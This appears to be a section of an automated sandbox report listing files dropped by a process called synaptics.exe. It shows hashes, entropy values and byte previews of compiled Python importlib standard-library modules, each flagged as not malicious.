                                                                                                                                                                                                            SHA-256:5BA1BD9B1812A20AFAAAD5B265E5E8F0EBA8008DE5B4320FF9A72F343D24B755
                                                                                                                                                                                                            SHA-512:1DBEA1A9DAC4B7653D2D4EF6A73BBC3D636DDD81800A4CE999387E27407F4050AB3434341801E7197B36BCD8AA19A7484C781407E3DF2F7C0FA878FD682A4AAC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dy........................@...sT...d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y)......d.d.l.m.Z...e...e.e.....Y.n.w.d.e._.d.e._.z.e...d.d...e._.W.n...e.yB......Y.n.w.e.e.j.d.<.z.d.d.l.Z.W.n...e.ye......d.d.l.m.Z...e...e.....e.e._.Y.n.w.d.e._.d.e._.z.e...d.d...e._.W.n...e.y~......Y.n.w.e.e.j.d.<.e.j.Z.e.j.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d.d...Z.i.Z.d.d...Z.d.S.).z'A pure Python implementation of import.)...__import__..import_module..invalidate_caches..reload.....N.....)..._bootstrapz.importlib._bootstrap..importlibz.__init__.pyz._bootstrap.py)..._bootstrap_externalz.importlib._bootstrap_externalz._bootstrap_external.py).r....c....................C...s"...t.j.D.].}.t.|.d...r.|.......q.d.S.).zmCall the invalidate_caches() method on all meta path finders stored in. sys.meta_path (where implemented).r....N)...sys..meta_path..hasattrr....)...finder..r.....AC:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\__init__.pyr....A...s..............r....c...............
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1995
                                                                                                                                                                                                            Entropy (8bit):5.0379588635185995
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lzGYO7KXEXsTqXrqj9FXHRLSVRibTAsKhnsRyy:/rEXpXrqhFXHPTbIsZ
                                                                                                                                                                                                            MD5:9C8A4E069BC975C718396D043B680100
                                                                                                                                                                                                            SHA1:702C81EA91B6E79F90ABE8CAFFDA0ACAF5B0ECF1
                                                                                                                                                                                                            SHA-256:3C2C2854FCAAD1A0338F7148C17D0AD2D1B7DB4047D44B5454ED4BA5073289CC
                                                                                                                                                                                                            SHA-512:47301F387B1F97793E71BCCCC79D6B2540CE345430FE1E8686E5202F53C4FC6EE7438499B7E0EE0FBEE82E23EB08B19883E42D789CB6325BE749E9880DE50342
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dr........................@...s8...d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.G.d.d...d.e.j.d...Z.d.S.).z>Subset of importlib.abc used to reduce importlib.util imports......)..._bootstrap.....Nc....................@...s(...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...Loaderz'Abstract base class for import loaders.c....................C...s....d.S.).z.Return a module to initialize and into which to load... This method should raise ImportError if anything prevents it. from creating a new module. It may return None to indicate. that the spec should create the new module.. N..)...self..specr....r.....=C:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\_abc.py..create_module....s......z.Loader.create_modulec....................C...s....t.|.d...s.t...t...|.|...S.).a....Return the loaded module... The module must be added to sys.modules and have import-related. attributes set properly. The fullname is a str... ImportError is raised on failu
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3727
                                                                                                                                                                                                            Entropy (8bit):4.671037298609076
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ddi1hyWa11p/5cIBqNU79FhTEnKIgVFKOmuD79VsUKyO9WoK/UML9Qa:MhyWGfxxB99FhkKIgDKONrsUK39WoK/L
                                                                                                                                                                                                            MD5:4CBD1B1B9FE674B3C8BC7A7533369219
                                                                                                                                                                                                            SHA1:456E7FFBD44044C0577FDEB091F3986F5203A9C6
                                                                                                                                                                                                            SHA-256:EE8CDFA8D1D40DBA8BF8E7A466D8995300BDEA49D3DE8EE8BBDF6F09BE5D02F8
                                                                                                                                                                                                            SHA-512:BDAB35DBF28BF4B5989548105C862790B6FC966A75A8A6B3AE9B3DED0A33D1063BF0126AAD1B97BC464704BF3A6FB567DF93650657FF26984E6C2552C2AA696A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sN...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d...Z.G.d.d...d...Z.G.d.d...d...Z.d.d...Z.d.S.)......)...suppress.....)...abcc....................@...s(...e.Z.d.Z.d.Z.d.d...f.d.d...Z.d.d...Z.d.S.)...SpecLoaderAdapterz>. Adapt a package spec to adapt the underlying loader.. c....................C...s....|.j.S...N)...loader....spec..r.....BC:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\_adapters.py..<lambda>....s......z.SpecLoaderAdapter.<lambda>c....................C...s....|.|._.|.|...|._.d.S.r....).r....r....)...selfr....Z.adapterr....r....r......__init__....s........z.SpecLoaderAdapter.__init__c....................C........t.|.j.|...S.r....)...getattrr......r......namer....r....r......__getattr__...........z.SpecLoaderAdapter.__getattr__N)...__name__..__module__..__qualname__..__doc__r....r....r....r....r....r....r........s............r....c....................@...s ...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.)...TraversableResourcesLoaderz9. Adap
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2991
                                                                                                                                                                                                            Entropy (8bit):5.205803441720797
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:ldfiZ38jH+kP4PY+IuyYalBABDu0ZLmJ2SOoHft3XlY2s03f/mm2vJviUeXrowab:jfipsH3AqYali7ZL7dillY2s033mm2vX
                                                                                                                                                                                                            MD5:E4AD1BE4EBF4A47CF3749342C49AA5A5
                                                                                                                                                                                                            SHA1:CECBE9E43387C1FB0E6A137222F8C81497339B00
                                                                                                                                                                                                            SHA-256:3DFAF0C5A074792926DB8331C16C2705E2F69B0E7B5DB5E4DED97410452072A8
                                                                                                                                                                                                            SHA-512:8C790D3AEC9F7CB07D988F81A9D26413FA1850420FD4208AE903C6F54088F26E72D08573A3C4E59D32B454CA91E8386FFA0828F739386E2BDFA37BB97B97D2E3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.e.j.e.f...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.d.e.j.d...d.d.....Z.e.j.d.d.....Z.e...e.j...e.j.d.d.......Z d.S.)......N)...Union..Any..Optional.....)...ResourceReader..Traversable)...wrap_specc....................C...s....t.t.|.....S.).z3. Get a Traversable resource from a package. )...from_package..get_package)...package..r.....@C:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\_common.py..files....s......r....c....................C...s....t.|...}.t.j...|...\.}.}.|.r.t.|...d.......|.S.).z.Normalize a path by ensuring it is a string... If the resulting string contains path separators, an exception is raised.. z. must be only a file name)...str..os..path..split..ValueError).r....Z.str_path..parent..file_namer....r....r......normalize_path....s..............r....c....................C...s*...|.j.}.t.|.j.d.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15915
                                                                                                                                                                                                            Entropy (8bit):5.108872990232223
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:zzjB5HGaViuYo8vEVbFCibM/50LbCb1EVMXS6O9PzXDPJ8OoEAuDdPTaX/DOWP6s:zzDVnR8gC/50LbjVMA9PrWCDaX/P6s
                                                                                                                                                                                                            MD5:DE327959D4C796AE2B764D2E4250F357
                                                                                                                                                                                                            SHA1:13B226D82701A79CBD4B5A8ABC16A5765BE10C57
                                                                                                                                                                                                            SHA-256:485D57E523F1E154BAFB85D0A390D082759457D67522731D5BB26E03D0A9B4CF
                                                                                                                                                                                                            SHA-512:41CEE8FA0632AC5525473C3C631C15BD108A6FE107FDE976D7EC343355E9474AB081250DB7EFC4BC70C3E7BD7515A6E1A362F00415CC514D948EB878E4FFF62D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.:.......................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.Z.W.n...e.y...Z...z.e.j.d.k.r"..d.Z.W.Y.d.Z.[.n.d.Z.[.w.w.z.d.d.l.Z.W.n...e.y@......e.Z.Y.n.w.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d...Z.G.d.d...d.e.j.d...Z.G.d.d...d.e.j.d...Z.e.e.e.j.e.j.e.j.e.j.....G.d.d...d.e.j.d...Z.e.e.e.j.....G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.e.j.e.j.....G.d.d...d.e...Z.e.e.e.j ....G.d.d...d.e.j!e.e...Z!e.e!e.j"e.j#....G.d.d...d.e.j$e.e...Z$e.e$e.j"....G.d.d...d.e.j.d...Z%e.G.d.d ..d e.....Z&G.d!d"..d"e%..Z'd.S.)#z(Abstract base classes related to import......)..._bootstrap_external)...machinery.....N.._frozen_importlib)...Loader)...BinaryIO..Iterable..Text)...Protocol..runtime_checkablec....................G...sZ...|.D.](}.|...|.....t.d.u.r*z.t.t.|.j...}.W.n...t.y$......t.t.|.j...}.Y.n.w.|...|.....q.d.S...N)...registerr......getattr..__name__..AttributeError.._frozen_importlib_external).Z.abstract_clsZ.classes..clsZ.frozen_cls..r.....<C:\Users\user\
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):968
                                                                                                                                                                                                            Entropy (8bit):5.414402015927617
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:lrjoXT16iGMJgQFpAquj8GifdXsrmH58K:lreG0Oqu05sr3K
                                                                                                                                                                                                            MD5:1ABCB8B314E9A54D5F72A3CF3E070476
                                                                                                                                                                                                            SHA1:2324B4A50F61B7F47515C5A14B284C46BC0381DC
                                                                                                                                                                                                            SHA-256:1754A61D4A5E737311AA6AAFD32AFD2BD76A7F4B3501BC8577DC5B7654BD0D34
                                                                                                                                                                                                            SHA-512:00045AC3221C4815561882A2453BEF434200830352B89F5C41485948891F977931FC5A1430B8EEA8614C8D803A511AE11B105181019648E424D49E66EB4CC2E2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dR........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.S.).z9The machinery of importlib: finders, loaders, hooks, etc......)...ModuleSpec)...BuiltinImporter)...FrozenImporter)...SOURCE_SUFFIXES..DEBUG_BYTECODE_SUFFIXES..OPTIMIZED_BYTECODE_SUFFIXES..BYTECODE_SUFFIXES..EXTENSION_SUFFIXES)...WindowsRegistryFinder)...PathFinder)...FileFinder)...SourceFileLoader)...SourcelessFileLoader)...ExtensionFileLoaderc....................C...s....t.t...t...S.).zAReturns a list of all recognized module suffixes for this process).r....r....r......r....r.....BC:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\machinery.py..all_suffixes....s......r....N)...__doc__.._bootstrapr....r....r......_bootstrap_externalr....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r......<module>....s............................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5206
                                                                                                                                                                                                            Entropy (8bit):4.8811314096021645
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:zPv4oTQ1zsquRgowzdmCbBavWMPTjTzKuhXBoPTl906kEt7IQ7ClEXsjMptAWrxB:FQ1ztyvedlbB7IruuhXBoPTlK9EhIQOi
                                                                                                                                                                                                            MD5:5B1A082411FA676F95BBCA19E4EE963D
                                                                                                                                                                                                            SHA1:4D592CDA05237E966C213E269ABB4CBE490BD127
                                                                                                                                                                                                            SHA-256:7160A589B3E8C1541EA834A0CEE8ADD3B8929C8FA3AA3DD84F39C5A65E4531D0
                                                                                                                                                                                                            SHA-512:66A1F8CFBB07D0F053764CD82802853ED7E50A6CCC2125750CDA6D2E89A68A0DF098BE6968BC542FF5D4357F63BE77975DACC172E5C491E4AC528534623709BB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d~........................@...sx...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.S.)......N.....)...abcc....................C...s....t.t.j...|.....S...N)...iter..collections..OrderedDict..fromkeys)...items..r.....@C:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\readers.py..remove_duplicates...........r....c....................@....$...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...FileReaderc....................C...s....t...|.j...j.|._.d.S.r....)...pathlib..Path..path..parent)...self..loaderr....r....r......__init__....s......z.FileReader.__init__c....................C........t.|.j...|.....S...z{. Return the file system path to prevent. `resources.path()` from creating a temporary. copy.. ....strr......joinpath..r......resourcer....r....r......resource_path...........z.FileReader.resource_pathc....................C........|.j.S.r......r......r....r....r....r......files.........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5393
                                                                                                                                                                                                            Entropy (8bit):5.3439540379215735
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:5zYSudPIqJNGeMzW9dlfxV10JJgFGx6qjBfjO6y3SnKL49oNhbMrhKgTlv:5JBnS9xV1SJgGx6AjI3SKyhRTlv
                                                                                                                                                                                                            MD5:767A7C3C10ABAB419C970803961197B4
                                                                                                                                                                                                            SHA1:7DA3531E09AD77FED0F31679EA2848D1F14E9491
                                                                                                                                                                                                            SHA-256:0B75A9C1C8A7F0AFD2067994A031A6F9E6CC3E45003FA5F6BBA221E7E2FA5B38
                                                                                                                                                                                                            SHA-512:7086F5416A16B6CE56A1D5635C9C79294549061B97F8C7B5F6ADBAE9338EA6E3F9C91E20C9B618EB1CE51CD9F8B6ECEFC4990B3FA8917D19E3B49FEE63487D35
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z e.e!e.f...Z"e.e!e.j#f...Z$d.e"d.e$d.e.f.d.d...Z%....d3d.e"d.e$d.e!d.e!d.e.f.d.d...Z&d.e"d.e$d.e'f.d.d...Z(....d3d.e"d.e$d.e!d.e!d.e!f.d.d ..Z)d.e"d.e$d.d!f.d"d#..Z*d$d%..Z+d&d'..Z,d(d)..Z-d.e"d*e!d.e.f.d+d,..Z/d.e"d.e.e!..f.d-d...Z0e.d/d0....Z1e1.2e...d1d2....Z3d.S.)4.....N.....)..._common)...as_file..files)...ResourceReader)...suppress)...ResourceLoader)...ModuleSpec)...BytesIO..TextIOWrapper)...Path)...ModuleType)...ContextManager..Iterable..Union)...cast)...BinaryIO..TextIO)...Sequence)...singledispatch)...Package..Resourcer....r......contentsr......is_resource..open_binary..open_text..path..read_binary..read_text..package..resource..returnc....................C...s&...t...|...}.t...|...}.t...|...}.|.d.u.r.|...|...S.t.t.|.j...}.|
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9353
                                                                                                                                                                                                            Entropy (8bit):5.32110538902901
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mptzll1YVqQzvbab+Q3+LbcwE5lFz0w7/RhZT:ITl1YVqoeb+QuLbpmFz06RhZT
                                                                                                                                                                                                            MD5:87386441616F11B3CD55759220A99842
                                                                                                                                                                                                            SHA1:F18ED3F4F99D25A6E55AD7EF4BBDA73813E32C31
                                                                                                                                                                                                            SHA-256:F807CFBBBFBB41D37063A4FD377D13E3386C80A67768FE896FBDE3145F26AEE4
                                                                                                                                                                                                            SHA-512:21A7A350A9AB02FECD8BD2ED519D8C861F80F706D20A345D14E835A2280D9C2EF19DD4ACC79A1967A8530C61B9C594640C3D83F5921217F32B2382AA1A5DA717
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s*...d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.d.d...Z.d$d.d...Z.d$d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.G.d d!..d!e.j...Z.G.d"d#..d#e...Z d.S.)%z-Utility code for constructing importers, etc......)...Loader)...module_from_spec)..._resolve_name)...spec_from_loader)..._find_spec)...MAGIC_NUMBER)..._RAW_MAGIC_NUMBER)...cache_from_source)...decode_source)...source_from_cache)...spec_from_file_location.....)...contextmanagerNc....................C...s....t...t.|...S.).zBReturn the hash of *source_bytes* as used in hash-based pyc files.)..._imp..source_hashr....)...source_bytes..r.....=C:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\util.pyr........s......r....c....................C...s\...|...d...s.|.S.|.s.t.d.t.|.....d.......d.}.|.D.].}.|.d.k.r...n.|.d.7.}.q.t.|.|.d.....|.|...S.).z2Res
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):37120
                                                                                                                                                                                                            Entropy (8bit):5.211626473615754
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:b7MjZ3JEQWRwd2Aj+j5El+bA16p34b50nOlt8/:b7cAL9iGzo+Ol2/
                                                                                                                                                                                                            MD5:4BE663667F19356679BC2E5F7FF57E0E
                                                                                                                                                                                                            SHA1:37D7E944D410779684C39B51E76B3D534AB70FE5
                                                                                                                                                                                                            SHA-256:55645A83A679BB7BD4CCACAAB5B5F756DA5A0CB1817A626A0899A776740E9DDE
                                                                                                                                                                                                            SHA-512:16C8673493F63BD5798D174EC8FD68BF00706511CBC9D4612C057751D0144DEA7616364D22997D6644DE8B02593421E0058377D6558BC2E5B3B04F43A9079270
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.{.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l.m"Z"..d.d.l#m$Z$m%Z%m&Z&m'Z'..g.d...Z(G.d.d...d.e)..Z*G.d.d...d...Z+G.d.d...d.e..,d.d.....Z-G.d.d...d.e...Z/G.d.d...d.e/..Z0G.d.d...d...Z1G.d.d...d.e1e2..Z3G.d.d ..d e.j4..Z5G.d!d"..d"..Z6G.d#d$..d$..Z7G.d%d&..d&e!..Z8G.d'd(..d(..Z9G.d)d*..d*..Z:G.d+d,..d,..Z;G.d-d...d.e8..Z<G.d/d0..d0e7..Z=d1d2..Z>d3d4..Z?d5e.j.f.d6d7..Z@d8d9..ZAd5e'e0e3f...f.d:d;..ZBd<d=..ZCd>d?..ZDd5e%eEe$eE..f...f.d@dA..ZFd.S.)B.....N.....)..._adapters.._meta)...PackageMetadata)...FreezableDefaultDict..Pair)...method_cache..pass_none)...unique_everseen).r......SimplePath)...suppress)...import_module)...MetaPathFinder)...starmap)...List..Mapping..Optional..Union)...Distribution..DistributionFinderr......PackageNotFoundError..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2368
                                                                                                                                                                                                            Entropy (8bit):5.168844884825288
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:l9uvHOKj19XocKHdq5UHdUktPdSNwplt9SDYvloUTG:AHOK3ocKHdqUdUWlSWplZ9oEG
                                                                                                                                                                                                            MD5:47E4283CD2F8D94F6F6D21504ABD4BE8
                                                                                                                                                                                                            SHA1:E1ED98A7F468DCF5C7F9E24D0C2C7A0F4802E036
                                                                                                                                                                                                            SHA-256:CA658171CB7ACD8C14E8B78CF19DE47C6DBE6BE06A4D40115120B1C77F1D8F88
                                                                                                                                                                                                            SHA-512:B58949E848F598994AB09A40922998025FDF69A2BEE44CC54CFDF0066F08D54E3D203DF78CC6F6F00F0AF5C45877C7EFA44EE0FD2A13DB69FD95A5D079FB7D1A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s<...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...G.d.d...d.e.j.j...Z.d.S.)......N.....)...FoldedCasec........................sb...e.Z.d.Z.e.e.e.g.d.......Z...d.e.j.j.f...f.d.d...Z.d.d...Z...f.d.d...Z.d.d...Z.e.d.d.....Z.....Z.S.)...Message).Z.Classifierz.Obsoletes-DistZ.Platformz.Project-URLz.Provides-Distz.Provides-Extraz.Requires-Distz.Requires-Externalz.Supported-PlatformZ.Dynamic..origc........................s"...t.....|...}.t.|.....t.|.......|.S...N)...super..__new__..vars..update)...clsr......res....__class__...KC:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\metadata\_adapters.pyr........s..........z.Message.__new__c....................O...s....|.....|._.d.S.r....)..._repair_headers.._headers)...self..args..kwargsr....r....r......__init__#...s......z.Message.__init__c........................s....t.......S.r....).r......__iter__..r....r....r....r....r....'...s......z.Message.__iter__c........................s>...d.d.......f.d.d...t.|...d...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1543
                                                                                                                                                                                                            Entropy (8bit):5.032863321149978
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lYBf0Xkl4KOSI4mh6p6nqdcWB1cegfhe+oqq60qqp:+WXTKOSe62qdDB1cegJeJqq60qqp
                                                                                                                                                                                                            MD5:A7C33B14EC80EE05412101FB75B7260F
                                                                                                                                                                                                            SHA1:9870F08F11F4CAC59C0E9970EB3674B85564AD87
                                                                                                                                                                                                            SHA-256:82D245BE15052FF16F03303CB7A3C928E5C6DFA5B5BABE1745D3235DCEB8B418
                                                                                                                                                                                                            SHA-512:D49F372C66FBCA8FCB28057D4FD7C22949DFECFFE6E9BE4B39966457A9E43A3DFA98E303F4DF971EA911399D751108B197649B15C1E0872D36E39256B21C3E4C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s6...d.d.l.Z.G.d.d...d.e.j...Z.G.d.d...d.e...d.d.....Z.d.S.)......Nc........................s(...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.....Z.S.)...FreezableDefaultDicta!.... Often it is desirable to prevent the mutation of. a default dict after its initial construction, such. as to prevent mutation during iteration... >>> dd = FreezableDefaultDict(list). >>> dd[0].append('1'). >>> dd.freeze(). >>> dd[1]. []. >>> len(dd). 1. c........................s....t.|.d.t...j...|...S.).N.._frozen)...getattr..super..__missing__)...self..key....__class__...NC:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\metadata\_collections.pyr........s......z FreezableDefaultDict.__missing__c........................s......f.d.d....._.d.S.).Nc........................s..........S.).N)...default_factory).r......r....r....r......<lambda>....s......z-FreezableDefaultDict.freeze.<locals>.<lambda>).r....r....r....r....r......freeze....s......z.Fr
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3133
                                                                                                                                                                                                            Entropy (8bit):5.107483314435514
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lyHbuTGKoOIXlUsSUUEQ1lGIGX5G5GurSYwBpHPdG7lfsJdSOTK/J/SarXN0le/M:PoOCDUX4sXwjvMXNpa561qoOIk
                                                                                                                                                                                                            MD5:5CBB6A76B7794E9C73514ADA96D7231E
                                                                                                                                                                                                            SHA1:6016D91D328A87767B9E0F69F53DCA0DD32C32D4
                                                                                                                                                                                                            SHA-256:F097420DD996DDE4E04F562C915942508F5F9D3B77F379045B662F2D60F5DD18
                                                                                                                                                                                                            SHA-512:D737F45D7E6A8892A25565CAAD37CC43FC0013EBF82C97C782967ABD7AC15FA2E4EC82FCFBD65A41B0DF0502F04EA1616AB61C529DF10EAF7147FA5524256141
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s&...d.d.l.Z.d.d.l.Z.d.d.d...Z.d.d...Z.d.S.)......Nc........................s(.....p.t...........f.d.d...}.d.d...|._.|.S.).aV.... Wrap lru_cache to support storing the cache data in the object instances... Abstracts the common paradigm where the method explicitly saves an. underscore-prefixed protected property on first call and returns that. subsequently... >>> class MyClass:. ... calls = 0. .... ... @method_cache. ... def method(self, value):. ... self.calls += 1. ... return value.. >>> a = MyClass(). >>> a.method(3). 3. >>> for x in range(75):. ... res = a.method(x). >>> a.calls. 75.. Note that the apparent behavior will be exactly like that of lru_cache. except that the cache is stored on each instance, so values in one. instance will not flush values from another, and when an instance is. deleted, so are the cached values for that instance...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):595
                                                                                                                                                                                                            Entropy (8bit):5.187554540907631
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CCy//48ZPUbmR6OHRgD4gvwfJLV0jyr4eVfswsoVzoufN++k+Zqq18:lsDPUe6+k4fJgyEEfgODlfnZqq18
                                                                                                                                                                                                            MD5:E628272F9380DB4217FDB3DF472A2475
                                                                                                                                                                                                            SHA1:5BB1D65FD265558BB79970F2EE70CC943C251B6B
                                                                                                                                                                                                            SHA-256:9DACAA103628FF1089C1A94A25077A1B78C08C14611EE47075A50B9E67F38BA9
                                                                                                                                                                                                            SHA-512:8006373B3262AE7D103D22AF55F2847EB02DBE5A26B882065ACE4C2B5B31DFFE7168F1A3DE091B39F699EFAD1893BC648860E354F8B544B5EA4979A9FC27E233
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
